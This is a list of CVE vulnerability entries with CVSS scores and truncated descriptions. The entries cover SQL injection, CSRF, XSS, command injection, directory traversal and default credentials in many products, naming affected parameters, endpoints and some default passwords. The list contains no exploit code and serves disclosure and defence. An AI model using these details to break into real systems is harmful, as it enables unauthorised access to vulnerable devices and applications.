16-05-2017 - 06:29 16-05-2017 - 06:29
CVE-2017-7952 6.5
INFOR EAM V11.0 Build 201410 has SQL injection via search fields, related to the filtervalue parameter.
16-05-2017 - 06:29 16-05-2017 - 06:29
CVE-2017-8928 6.8
mailcow 0.14, as used in "mailcow: dockerized" and other products, has CSRF.
14-05-2017 - 18:29 14-05-2017 - 18:29
CVE-2017-8912 6.5
** DISPUTED ** CMS Made Simple (CMSMS) 2.1.6 allows remote authenticated administrators to execute arbitrary PHP code via the code parameter to admin/editusertag.php, related to the CreateTagFunction and CallUserTag functions. NOTE: the vendor report
12-05-2017 - 03:29 12-05-2017 - 03:29
CVE-2017-7981 9.0
Tuleap before 9.7 allows command injection via the PhpWiki 1.3.10 SyntaxHighlighter plugin. This occurs in the Project Wiki component because the proc_open PHP function is used within PhpWiki before 1.5.5 with a syntax value in its first argument, an
11-05-2017 - 10:22 29-04-2017 - 12:59
CVE-2017-5638 10.0
The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a
09-05-2017 - 21:29 10-03-2017 - 21:59
CVE-2016-2183 5.0
The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birth
09-05-2017 - 21:29 31-08-2016 - 20:59
CVE-2017-8295 4.3
WordPress through 4.7.4 relies on the Host HTTP header for a password-reset e-mail message, which makes it easier for remote attackers to reset arbitrary passwords by making a crafted wp-login.php?action=lostpassword request and then arranging for th
05-05-2017 - 21:29 04-05-2017 - 10:29
CVE-2017-7221 6.5
OpenText Documentum Content Server has an inadequate protection mechanism against SQL injection, which allows remote authenticated users to execute arbitrary code with super-user privileges by leveraging the availability of the dm_bp_transition docba
05-05-2017 - 20:09 25-04-2017 - 10:59
CVE-2017-3549 7.5
Vulnerability in the Oracle Scripting component of Oracle E-Business Suite (subcomponent: Scripting Administration). Supported versions that are affected are 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily "exploitable" vulnerabilit
04-05-2017 - 14:01 24-04-2017 - 15:59
CVE-2017-3528 5.8
Vulnerability in the Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)). Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily "exp
04-05-2017 - 11:55 24-04-2017 - 15:59
CVE-2017-3548 6.4
Vulnerability in the PeopleSoft Enterprise PeopleTools component of Oracle PeopleSoft Products (subcomponent: Integration Broker). Supported versions that are affected are 8.54 and 8.55. Easily "exploitable" vulnerability allows unauthenticated attac
04-05-2017 - 11:54 24-04-2017 - 15:59
CVE-2017-3546 6.4
Vulnerability in the PeopleSoft Enterprise PeopleTools component of Oracle PeopleSoft Products (subcomponent: MultiChannel Framework). Supported versions that are affected are 8.54 and 8.55. Easily "exploitable" vulnerability allows unauthenticated a
04-05-2017 - 11:54 24-04-2017 - 15:59
CVE-2016-5063 5.0
The RSCD agent in BMC Server Automation before 8.6 SP1 Patch 2 and 8.7 before Patch 3 on Windows might allow remote attackers to bypass authorization checks and make an RPC call via unspecified vectors.
02-05-2017 - 10:59 02-05-2017 - 10:59
CVE-2015-8257 9.0
The devtools.sh script in AXIS network cameras allows remote authenticated users to execute arbitrary commands via shell metacharacters in the app parameter to (1) app_license.shtml, (2) app_license_custom.shtml, (3) app_index.shtml, or (4) app_param
02-05-2017 - 10:59 02-05-2017 - 10:59
CVE-2016-4313 6.8
Directory traversal vulnerability in unzip/extract feature in eXtplorer 2.1.9 allows remote attackers to execute arbitrary files via a .. (dot dot) in an archive file.
01-05-2017 - 21:59 24-04-2017 - 14:59
CVE-2017-5631 4.3
An issue was discovered in KMCIS CaseAware. Reflected cross site scripting is present in the user parameter (i.e., "usr") that is transmitted in the login.php query string.
01-05-2017 - 10:59 01-05-2017 - 10:59
CVE-2014-7235 10.0
htdocs_ari/includes/login.php in the ARI Framework module/Asterisk Recording Interface (ARI) in FreePBX before 2.9.0.9, 2.10.x, and 2.11 before 2.11.1.5 allows remote attackers to execute arbitrary code via the ari_auth cookie, related to the PHP uns
28-04-2017 - 21:59 07-10-2014 - 10:55
CVE-2015-7247 7.8
D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 discloses usernames, passwords, keys, values, and web account hashes (super and admin) in plaintext when running a configuration backup, which allows remote attackers to obtain se
28-04-2017 - 14:49 24-04-2017 - 14:59
CVE-2015-7246 10.0
D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 has a default password of root for the root account and tw for the tw account, which makes it easier for remote attackers to obtain administrative access.
28-04-2017 - 14:33 24-04-2017 - 14:59
CVE-2015-7245 5.0
Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
28-04-2017 - 13:47 24-04-2017 - 14:59
CVE-2015-7568 7.5
SQL injection vulnerability in the password recovery feature in Yeager CMS 1.2.1 allows remote attackers to change the account credentials of known users via the "userEmail" parameter.
28-04-2017 - 12:26 24-04-2017 - 14:59
CVE-2015-7569 7.5
SQL injection vulnerability in "yeager/y.php/tab_USERLIST" in Yeager CMS 1.2.1 allows local users to execute arbitrary SQL commands via the "pagedir_orderby" parameter.
27-04-2017 - 15:15 24-04-2017 - 14:59
CVE-2015-7570 6.4
Multiple server-side request forgery (SSRF) vulnerabilities in Yeager CMS 1.2.1 allow remote attackers to trigger outbound requests and enumerate open ports via the dbhost parameter to libs/org/adodb_lite/tests/test_adodb_lite.php, libs/org/adodb_lit
27-04-2017 - 13:45 24-04-2017 - 14:59
CVE-2016-1713 8.5
Unrestricted file upload vulnerability in the Settings_Vtiger_CompanyDetailsSave_Action class in modules/Settings/Vtiger/actions/CompanyDetailsSave.php in Vtiger CRM 6.4.0 allows remote authenticated users to execute arbitrary code by uploading a cra
25-04-2017 - 11:52 14-04-2017 - 14:59
CVE-2015-8256 4.3
Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras.
24-04-2017 - 20:40 17-04-2017 - 12:59
CVE-2015-7572
** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2013-0237. Reason: This candidate is a duplicate of CVE-2013-0237. Notes: All CVE users should reference CVE-2013-0237 instead of this candidate. All references and descriptions in this
24-04-2017 - 14:59 24-04-2017 - 14:59
CVE-2016-5312 4.0
Directory traversal vulnerability in the charting component in Symantec Messaging Gateway before 10.6.2 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the sn parameter to brightmail/servlet/com.ve.kavachart.servlet.Ch
22-04-2017 - 10:16 14-04-2017 - 14:59
CVE-2015-8356 6.0
Multiple SQL injection vulnerabilities in the mcart.xls module 6.5.2 and earlier for Bitrix allow remote authenticated users to execute arbitrary SQL commands via the (1) xls_profile parameter to admin/mcart_xls_import.php or the (2) xls_iblock_id, (
22-04-2017 - 10:12 14-04-2017 - 10:59
CVE-2015-6567 6.5
Wolf CMS before 0.8.3.1 allows unrestricted file upload and PHP Code Execution because admin/plugin/file_manager/browse/ (aka the filemanager) does not validate the parameter "filename" properly. Exploitation requires a registered user who has access
21-04-2017 - 14:22 14-04-2017 - 12:59
CVE-2015-6568 6.5
Wolf CMS before 0.8.3.1 allows unrestricted file rename and PHP Code Execution because admin/plugin/file_manager/browse/ (aka the filemanager) does not prevent a change of a file extension to ".php" after originally using the parameter "filename" for
21-04-2017 - 14:21 14-04-2017 - 12:59
CVE-2017-7615 6.5
MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
21-04-2017 - 12:08 16-04-2017 - 10:59
CVE-2017-7725 4.3
concrete5 8.1.0 places incorrect trust in the HTTP Host header during caching, if the administrator did not define a "canonical" URL on installation of concrete5 using the "Advanced Options" settings. Remote attackers can make a GET request with any
20-04-2017 - 17:15 13-04-2017 - 13:59
CVE-2015-7562 4.3
Multiple cross-site scripting (XSS) vulnerabilities in TeamPass 2.1.24 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) label value of an item or (2) name of a role.
20-04-2017 - 09:41 12-04-2017 - 18:59
CVE-2015-7563 6.8
Cross-site request forgery (CSRF) vulnerability in TeamPass 2.1.24 and earlier allows remote attackers to hijack the authentication of an authenticated user.
20-04-2017 - 09:40 12-04-2017 - 18:59
CVE-2015-7564 7.5
Multiple SQL injection vulnerabilities in TeamPass 2.1.24 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) id parameter in an action_on_quick_icon action to item.query.php or the (2) order or (3) direction parameter in
20-04-2017 - 08:32 12-04-2017 - 18:59
CVE-2016-4337 7.5
SQL injection vulnerability in the mgr.login.php file in Ktools.net Photostore before 4.7.5 allows remote attackers to execute arbitrary SQL commands via the email parameter in a recover_login action.
19-04-2017 - 15:47 12-04-2017 - 18:59
CVE-2016-1915 4.3
Multiple cross-site scripting (XSS) vulnerabilities in BlackBerry Enterprise Server 12 (BES12) Self-Service before 12.4 allow remote attackers to inject arbitrary web script or HTML via the locale parameter to (1) mydevice/index.jsp or (2) mydevice/l
19-04-2017 - 15:46 13-04-2017 - 10:59
CVE-2016-1914 6.8
Multiple SQL injection vulnerabilities in the com.rim.mdm.ui.server.ImageServlet servlet in BlackBerry Enterprise Server 12 (BES12) Self-Service before 12.4 allow remote attackers to execute arbitrary SQL commands via the imageName parameter to (1) m
19-04-2017 - 15:45 13-04-2017 - 10:59
CVE-2015-8284 6.5
SeaWell Networks Spectrum SDC 02.05.00 allows remote viewer users to perform administrative functions.
19-04-2017 - 15:37 13-04-2017 - 10:59
CVE-2015-8283 6.8
Directory traversal vulnerability in configure_manage.php in SeaWell Networks Spectrum SDC 02.05.00.
19-04-2017 - 15:37 13-04-2017 - 10:59
CVE-2015-8282 7.5
SeaWell Networks Spectrum SDC 02.05.00 has a default password of "admin" for the "admin" account.
19-04-2017 - 15:37 13-04-2017 - 10:59
CVE-2017-7462 7.5
Intellinet NFC-30ir IP Camera has a vendor backdoor that can allow a remote attacker access to a vendor-supplied CGI script in the web directory.
18-04-2017 - 11:59 11-04-2017 - 11:59
CVE-2017-7461 6.8
Directory traversal vulnerability in the web-based management site on the Intellinet NFC-30ir IP Camera with firmware LM.1.6.16.05 allows remote attackers to read arbitrary files via a request to a vendor-supplied CGI script that is used to read HTML
18-04-2017 - 11:56 11-04-2017 - 11:59
CVE-2017-6206 5.0
D-Link DGS-1510-28XMP, DGS-1510-28X, DGS-1510-52X, DGS-1510-52, DGS-1510-28P, DGS-1510-28, and DGS-1510-20 Websmart devices with firmware before 1.31.B003 allow attackers to conduct Unauthenticated Information Disclosure attacks via unspecified vecto
17-04-2017 - 21:59 23-02-2017 - 01:59
CVE-2017-6088 9.0
Multiple SQL injection vulnerabilities in EyesOfNetwork (aka EON) 5.0 and earlier allow remote authenticated users to execute arbitrary SQL commands via the (1) bp_name, (2) display, (3) search, or (4) equipment parameter to module/monitoring_ged/ged
17-04-2017 - 14:18 11-04-2017 - 14:59
CVE-2017-7588 10.0
On certain Brother devices, authorization is mishandled by including a valid AuthCookie cookie in the HTTP response to a failed login attempt. Affected models are: MFC-J6973CDW MFC-J4420DW MFC-8710DW MFC-J4620DW MFC-L8850CDW MFC-J3720 MFC-J6520DW MFC
17-04-2017 - 11:44 12-04-2017 - 06:59
CVE-2017-5607 4.3
Splunk Enterprise 5.0.x before 5.0.18, 6.0.x before 6.0.14, 6.1.x before 6.1.13, 6.2.x before 6.2.13.1, 6.3.x before 6.3.10, 6.4.x before 6.4.6, and 6.5.x before 6.5.3 and Splunk Light before 6.5.2 assigns the $C JS property to the global Window name
17-04-2017 - 09:26 10-04-2017 - 11:59
CVE-2015-8258 7.8
AXIS Communications products with firmware through 5.80.x allow remote attackers to modify arbitrary files as root via vectors involving Open Script Editor, aka a "resource injection vulnerability."
13-04-2017 - 15:57 09-04-2017 - 23:59
CVE-2015-8255 6.8
AXIS Communications products allow CSRF, as demonstrated by admin/pwdgrp.cgi, vaconfig.cgi, and admin/local_del.cgi.
13-04-2017 - 14:59 09-04-2017 - 23:59
CVE-2016-7786 9.0
Sophos Cyberoam UTM CR25iNG 10.6.3 MR-5 allows remote authenticated users to bypass intended access restrictions via direct object reference, as demonstrated by a request for Licenseinformation.jsp. This is fixed in 10.6.5.
13-04-2017 - 12:09 07-04-2017 - 17:59
CVE-2017-7571 6.0
public/rolechangeadmin in Faveo 1.9.3 allows CSRF. The impact is obtaining admin privileges.
12-04-2017 - 16:36 06-04-2017 - 13:59
CVE-2017-6884 9.0
A command injection vulnerability was discovered on the Zyxel EMG2926 home router with firmware V1.00(AAQT.4)b8. The vulnerability is located in the diagnostic tools, specifically the nslookup function. A malicious user may exploit numerous vectors t
12-04-2017 - 14:29 06-04-2017 - 13:59
CVE-2017-7398 6.8
D-Link DIR-615 HW: T1 FW:20.09 is vulnerable to Cross-Site Request Forgery (CSRF) vulnerability. This enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated, as demonstrated by chang
11-04-2017 - 11:04 04-04-2017 - 10:59
CVE-2014-1677 5.0
Technicolor TC7200 with firmware STD6.01.12 could allow remote attackers to obtain sensitive information.
11-04-2017 - 09:36 03-04-2017 - 11:59
CVE-2017-7447 6.8
HelpDEZk 1.1.1 has CSRF in admin/home#/logos/ with an impact of remote execution of arbitrary PHP code.
10-04-2017 - 21:59 05-04-2017 - 18:59
CVE-2017-7446 6.8
HelpDEZk 1.1.1 has CSRF in admin/home#/person/ with an impact of obtaining admin privileges.
10-04-2017 - 18:19 05-04-2017 - 18:59
CVE-2017-7402 7.5
Pixie 1.0.4 allows remote authenticated users to upload and execute arbitrary PHP code via the POST data in an admin/index.php?s=publish&x=filemanager request for a filename with a double extension, such as a .jpg.php file with Content-Type of image/
10-04-2017 - 12:24 03-04-2017 - 13:59
CVE-2017-2442 4.3
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. The issue involves the "WebKit JavaScript Bindings" component. It allows remote attackers to bypass the Same Origin Policy and obtain sens
07-04-2017 - 14:42 01-04-2017 - 21:59
CVE-2017-2479 4.3
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is affected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is affected. The issue involves the
07-04-2017 - 14:41 01-04-2017 - 21:59
CVE-2017-2457 6.8
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corru
06-04-2017 - 15:33 01-04-2017 - 21:59
CVE-2017-2480 4.3
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is affected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is affected. The issue involves the
06-04-2017 - 15:30 01-04-2017 - 21:59
CVE-2017-2445 4.3
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to conduct Universal XSS (UXSS) attack
06-04-2017 - 15:08 01-04-2017 - 21:59
CVE-2017-2367 4.3
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to bypass the Same Origin Policy and o
06-04-2017 - 15:08 01-04-2017 - 21:59
CVE-2017-6549 9.3
Session hijack vulnerability in httpd on ASUS RT-N56U, RT-N66U, RT-AC66U, RT-N66R, RT-AC66R, RT-AC68U, RT-AC68R, RT-N66W, RT-AC66W, RT-AC87R, RT-AC87U, RT-AC51U, RT-AC68P, RT-N11P, RT-N12+, RT-N12E B1, RT-AC3200, RT-AC53U, RT-AC1750, RT-AC1900P, RT-N
05-04-2017 - 21:59 09-03-2017 - 04:59
CVE-2017-6548 10.0
Buffer overflows in networkmap on ASUS RT-N56U, RT-N66U, RT-AC66U, RT-N66R, RT-AC66R, RT-AC68U, RT-AC68R, RT-N66W, RT-AC66W, RT-AC87R, RT-AC87U, RT-AC51U, RT-AC68P, RT-N11P, RT-N12+, RT-N12E B1, RT-AC3200, RT-AC53U, RT-AC1750, RT-AC1900P, RT-N300, an
05-04-2017 - 21:59 09-03-2017 - 04:59
CVE-2017-6547 4.3
Cross-site scripting (XSS) vulnerability in httpd on ASUS RT-N56U, RT-N66U, RT-AC66U, RT-N66R, RT-AC66R, RT-AC68U, RT-AC68R, RT-N66W, RT-AC66W, RT-AC87R, RT-AC87U, RT-AC51U, RT-AC68P, RT-N11P, RT-N12+, RT-N12E B1, RT-AC3200, RT-AC53U, RT-AC1750, RT-A
05-04-2017 - 21:59 09-03-2017 - 04:59
CVE-2017-6182 7.5
In Sophos Web Appliance (SWA) before 4.3.1.2, a section of the machine's interface responsible for generating reports was vulnerable to remote command injection via functions, aka NSWA-1304.
04-04-2017 - 14:42 30-03-2017 - 13:59
CVE-2015-8309 4.0
Directory traversal vulnerability in Cherry Music before 0.36.0 allows remote authenticated users to read arbitrary files via the "value" parameter to "download."
29-03-2017 - 21:59 27-03-2017 - 11:59
CVE-2017-6366 6.8
Cross-site request forgery (CSRF) vulnerability in NETGEAR DGN2200 routers with firmware 10.0.0.20 through 10.0.0.50 allows remote attackers to hijack the authentication of users for requests that perform DNS lookups via the host_name parameter to dn
29-03-2017 - 10:03 15-03-2017 - 10:59
CVE-2017-6087 6.5
EyesOfNetwork ("EON") 5.0 and earlier allows remote authenticated users to execute arbitrary code via shell metacharacters in the selected_events[] parameter in the (1) acknowledge, (2) delete, or (3) ownDisown function in module/monitoring_ged/ged_f
28-03-2017 - 21:59 24-03-2017 - 10:59
CVE-2017-5869 6.5
Directory traversal vulnerability in the file import feature in Nuxeo Platform 6.0, 7.1, 7.2, and 7.3 allows remote authenticated users to upload and execute arbitrary JSP code via a .. (dot dot) in the X-File-Name header.
28-03-2017 - 21:59 24-03-2017 - 10:59
CVE-2016-1000125 7.5
Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
28-03-2017 - 14:31 06-10-2016 - 10:59
CVE-2017-2641 7.5
In Moodle 2.x and 3.x, SQL injection can occur via user preferences.
28-03-2017 - 13:16 26-03-2017 - 14:59
CVE-2017-6972 10.0
AlienVault USM and OSSIM before 5.3.7 and NfSen before 1.3.8 have an error in privilege dropping and unnecessarily execute the NfSen Perl code as root, aka AlienVault ID ENG-104945, a different vulnerability than CVE-2017-6970 and CVE-2017-6971.
28-03-2017 - 12:36 22-03-2017 - 16:59
CVE-2017-6971 9.0
AlienVault USM and OSSIM before 5.3.7 and NfSen before 1.3.8 allow remote authenticated users to execute arbitrary commands in a privileged context, or launch a reverse shell, via vectors involving the PHP session ID and the NfSen PHP code, aka Alien
28-03-2017 - 12:24 22-03-2017 - 10:59
CVE-2017-6361 10.0
QNAP QTS before 4.2.4 Build 20170313 allows attackers to execute arbitrary commands via unspecified vectors.
28-03-2017 - 10:44 23-03-2017 - 12:59
CVE-2017-6359 10.0
QNAP QTS before 4.2.4 Build 20170313 allows attackers to gain administrator privileges and execute arbitrary commands via unspecified vectors.
28-03-2017 - 10:39 23-03-2017 - 12:59
CVE-2017-6360 10.0
QNAP QTS before 4.2.4 Build 20170313 allows attackers to gain administrator privileges and obtain sensitive information via unspecified vectors.
28-03-2017 - 10:37 23-03-2017 - 12:59
CVE-2017-6896 6.5
Privilege escalation vulnerability on the DIGISOL DG-HR1400 1.00.02 wireless router enables an attacker to escalate from user privilege to admin privilege just by modifying the Base64-encoded session cookie value.
24-03-2017 - 21:59 14-03-2017 - 16:59
CVE-2017-6550 7.5
Multiple SQL injection vulnerabilities in Kinsey Infor-Lawson (formerly ESBUS) allow remote attackers to execute arbitrary SQL commands via the (1) TABLE parameter to esbus/servlet/GetSQLData or (2) QUERY parameter to KK_LS9ReportingPortal/GetData.
23-03-2017 - 11:09 20-03-2017 - 12:59
CVE-2017-5496 5.0
Sawmill Enterprise 8.7.9 allows remote attackers to gain login access by leveraging knowledge of a password hash.
21-03-2017 - 14:43 15-03-2017 - 11:59
CVE-2016-8855 4.3
Cross-Site Scripting (XSS) in "/sitecore/client/Applications/List Manager/Taskpages/Contact list" in Sitecore Experience Platform 8.1 rev. 160519 (8.1 Update-3) allows remote attacks via the Name or Description parameter. This is fixed in 8.2 Update-
21-03-2017 - 10:30 19-03-2017 - 14:59
CVE-2016-6174 6.8
applications/core/modules/front/system/content.php in Invision Power Services IPS Community Suite (aka Invision Power Board, IPB, or Power Board) before 4.1.13, when used with PHP before 5.4.24 or 5.5.x before 5.5.8, allows remote attackers to execut
20-03-2017 - 21:59 12-07-2016 - 15:59
CVE-2017-6823 6.5
Fiyo CMS 2.0.6.1 allows remote authenticated users to gain privileges via a modified level parameter to dapur/ in an app=user&act=edit action.
16-03-2017 - 21:59 12-03-2017 - 00:59
CVE-2017-6443 4.3
Cross-site scripting (XSS) vulnerability in EPSON TMNet WebConfig 1.00 allows remote attackers to inject arbitrary web script or HTML via the W_AD1 parameter to Forms/oadmin_1.
16-03-2017 - 14:17 15-03-2017 - 11:59
CVE-2017-6529 6.8
An issue was discovered in dnaTools dnaLIMS 4-2015s13. dnaLIMS is vulnerable to session hijacking by guessing the UID parameter.
14-03-2017 - 21:59 09-03-2017 - 14:59
CVE-2017-6528 4.3
An issue was discovered in dnaTools dnaLIMS 4-2015s13. dnaLIMS is affected by plaintext password storage (the /home/dna/spool/.pfile file).
14-03-2017 - 21:59 09-03-2017 - 14:59
CVE-2017-6527 5.0
An issue was discovered in dnaTools dnaLIMS 4-2015s13. dnaLIMS is vulnerable to a NUL-terminated directory traversal attack allowing an unauthenticated attacker to access system files readable by the web server user (by using the viewAppletFsa.cgi se
14-03-2017 - 21:59 09-03-2017 - 14:59
CVE-2017-6526 10.0
An issue was discovered in dnaTools dnaLIMS 4-2015s13. dnaLIMS is vulnerable to unauthenticated command execution through an improperly protected administrative web shell (cgi-bin/dna/sysAdmin.cgi POST requests).
14-03-2017 - 21:59 09-03-2017 - 14:59
CVE-2016-5809 6.8
An issue was discovered on Schneider Electric IONXXXX series power meters ION73XX series, ION75XX series, ION76XX series, ION8650 series, ION8800 series, and PM5XXX series. There is no CSRF Token generated to authenticate the user during a session. S
14-03-2017 - 15:18 13-02-2017 - 16:59
CVE-2015-6023 7.5
ping.cgi in NetCommWireless HSPA 3G10WVE wireless routers with firmware before 3G10WVE-L101-S306ETS-C01_R05 allows remote attackers to bypass intended access restrictions via a direct request. NOTE: this issue can be combined with CVE-2015-6024 to e
09-03-2017 - 15:33 09-02-2017 - 10:59
CVE-2017-6411 6.8
Cross Site Request Forgery (CSRF) on D-Link DSL-2730U C1 IN_1.00 devices allows remote attackers to change the DNS or firewall configuration or any password.
07-03-2017 - 21:59 06-03-2017 - 01:59
CVE-2017-6334 9.0
dnslookup.cgi on NETGEAR DGN2200 devices with firmware through 10.0.0.50 allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the host_name field of an HTTP POST request, a different vulnerability than CVE-20
07-03-2017 - 20:33 05-03-2017 - 21:59
CVE-2017-6104 5.0
Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0.
07-03-2017 - 09:17 02-03-2017 - 17:59
CVE-2017-5344 7.5
An issue was discovered in dotCMS through 3.6.1. The findChildrenByFilter() function which is called by the web accessible path /categoriesServlet performs string interpolation and direct SQL query execution. SQL quote escaping and a keyword blacklis
06-03-2017 - 21:59 17-02-2017 - 02:59
CVE-2017-6077 10.0
ping.cgi on NETGEAR DGN2200 devices with firmware through 10.0.0.50 allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ping_IPAddr field of an HTTP POST request.
01-03-2017 - 21:59 22-02-2017 - 18:59
CVE-2016-9682 10.0
The SonicWall Secure Remote Access server (version 8.1.0.2-14sv) is vulnerable to two Remote Command Injection vulnerabilities in its web administrative interface. These vulnerabilities occur in the diagnostics CGI (/cgi-bin/diagnostics) component re
01-03-2017 - 21:59 22-02-2017 - 00:59
CVE-2015-2794 7.5
The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.
01-03-2017 - 21:59 06-02-2017 - 10:59
CVE-2016-6175 7.5
Eval injection vulnerability in php-gettext 1.0.12 and earlier allows remote attackers to execute arbitrary PHP code via a crafted plural forms header.
28-02-2017 - 12:49 07-02-2017 - 10:59
CVE-2017-5630 5.0
PECL in the download utility class in the Installer in PEAR Base System v1.10.1 does not validate file types and filenames after a redirect, which allows remote HTTP servers to overwrite files via crafted responses, as demonstrated by a .htaccess ove
28-02-2017 - 10:34 01-02-2017 - 18:59
CVE-2016-3694 7.5
Multiple SQL injection vulnerabilities in modified eCommerce Shopsoftware 2.0.0.0 revision 9678, when the easybill-module is not installed, allow remote attackers to execute arbitrary SQL commands via the (1) orders_status or (2) customers_status par
23-02-2017 - 13:20 15-02-2017 - 14:59
CVE-2017-6097 6.5
A SQL injection issue was discovered in the Mail Masta (aka mail-masta) plugin 1.0 for WordPress. This affects /inc/campaign/count_of_send.php (Requires authentication to Wordpress admin) with the POST Parameter: camp_id.
23-02-2017 - 10:07 21-02-2017 - 02:59
CVE-2017-6096 6.5
A SQL injection issue was discovered in the Mail Masta (aka mail-masta) plugin 1.0 for WordPress. This affects /inc/lists/view-list.php (Requires authentication to Wordpress admin) with the GET Parameter: filter_list.
23-02-2017 - 10:07 21-02-2017 - 02:59
CVE-2017-6095 7.5
A SQL injection issue was discovered in the Mail Masta (aka mail-masta) plugin 1.0 for WordPress. This affects /inc/lists/csvexport.php (Unauthenticated) with the GET Parameter: list_id.
23-02-2017 - 10:00 21-02-2017 - 02:59
CVE-2017-6098 6.5
A SQL injection issue was discovered in the Mail Masta (aka mail-masta) plugin 1.0 for WordPress. This affects /inc/campaign_save.php (Requires authentication to Wordpress admin) with the POST Parameter: list_id.
23-02-2017 - 09:57 21-02-2017 - 02:59
CVE-2016-4312 6.0
XML external entity (XXE) vulnerability in the XACML flow feature in WSO2 Identity Server 5.1.0 before WSO2-CARBON-PATCH-4.4.0-0231 allows remote authenticated users with access to XACML features to read arbitrary files, cause a denial of service, co
22-02-2017 - 11:23 16-02-2017 - 21:59
CVE-2016-4311 6.8
Cross-site request forgery (CSRF) vulnerability in the XACML flow feature in WSO2 Identity Server 5.1.0 allows remote attackers to hijack the authentication of privileged users for requests that process XACML requests via an entitlement/eval-policy-s
22-02-2017 - 11:20 16-02-2017 - 21:59
CVE-2017-2365 4.3
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. Safari before 10.0.3 is affected. tvOS before 10.1.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to bypass the Same Origin Policy
22-02-2017 - 10:56 20-02-2017 - 03:59
CVE-2017-2364 4.3
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. Safari before 10.0.3 is affected. The issue involves the "WebKit" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive informatio
22-02-2017 - 10:56 20-02-2017 - 03:59
CVE-2009-0674 6.0
images/captcha.php in Raven Web Services RavenNuke 2.30, when register_globals and display_errors are enabled, allows remote attackers to determine the existence of local files by sending requests with full pathnames in the aFonts array parameter, an
19-02-2017 - 00:26 22-02-2009 - 17:30
CVE-2008-6282 6.5
SQL injection vulnerability in engine/users/users_edit_pub.inc in CMS Ortus 1.13 and earlier allows remote authenticated users to execute arbitrary SQL commands via the city parameter in a users_edit_pub action to index.php.
19-02-2017 - 00:25 25-02-2009 - 18:30
CVE-2008-5589 7.5
SQL injection vulnerability in processlogin.asp in Katy Whitton RankEm allows remote attackers to execute arbitrary SQL commands via the (1) txtusername parameter (aka username field) or the (2) txtpassword parameter (aka password field). NOTE: some
19-02-2017 - 00:24 16-12-2008 - 14:07
CVE-2008-4902 7.5
SQL injection vulnerability in contact_author.php in Article Publisher Pro 1.5 allows remote attackers to execute arbitrary SQL commands via the userid parameter.
19-02-2017 - 00:24 03-11-2008 - 19:58
CVE-2008-3307 7.5
SQL injection vulnerability in todos.php in C. Desseno YouTube Blog (ytb) 0.1 allows remote attackers to execute arbitrary SQL commands via the id parameter, a different vector than CVE-2008-3306.
19-02-2017 - 00:23 25-07-2008 - 12:41
CVE-2006-2998 7.5
PHP remote file inclusion vulnerability in board/post.php in free QBoard 1.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the qb_path parameter.
19-02-2017 - 00:12 12-06-2006 - 21:02
CVE-2016-4316 4.3
Multiple cross-site scripting (XSS) vulnerabilities in WSO2 Carbon 4.4.5 allow remote attackers to inject arbitrary web script or HTML via the (1) setName parameter to identity-mgt/challenges-mgt.jsp; the (2) webappType or (3) httpPort parameter to w
17-02-2017 - 12:42 16-02-2017 - 21:59
CVE-2016-4314 4.0
Directory traversal vulnerability in the LogViewer Admin Service in WSO2 Carbon 4.4.5 allows remote authenticated administrators to read arbitrary files via a .. (dot dot) in the logFile parameter to downloadgz-ajaxprocessor.jsp.
17-02-2017 - 12:42 16-02-2017 - 21:59
CVE-2016-4315 3.5
Cross-site request forgery (CSRF) vulnerability in WSO2 Carbon 4.4.5 allows remote attackers to hijack the authentication of privileged users for requests that shutdown a server via a shutdown action to server-admin/proxy_ajaxprocessor.jsp.
17-02-2017 - 12:35 16-02-2017 - 21:59
CVE-2016-9351 6.0
An issue was discovered in Advantech SUISAccess Server Version 3.0 and prior. The directory traversal/file upload error allows an attacker to upload and unpack a zip file.
17-02-2017 - 09:22 13-02-2017 - 16:59
CVE-2016-9349 5.0
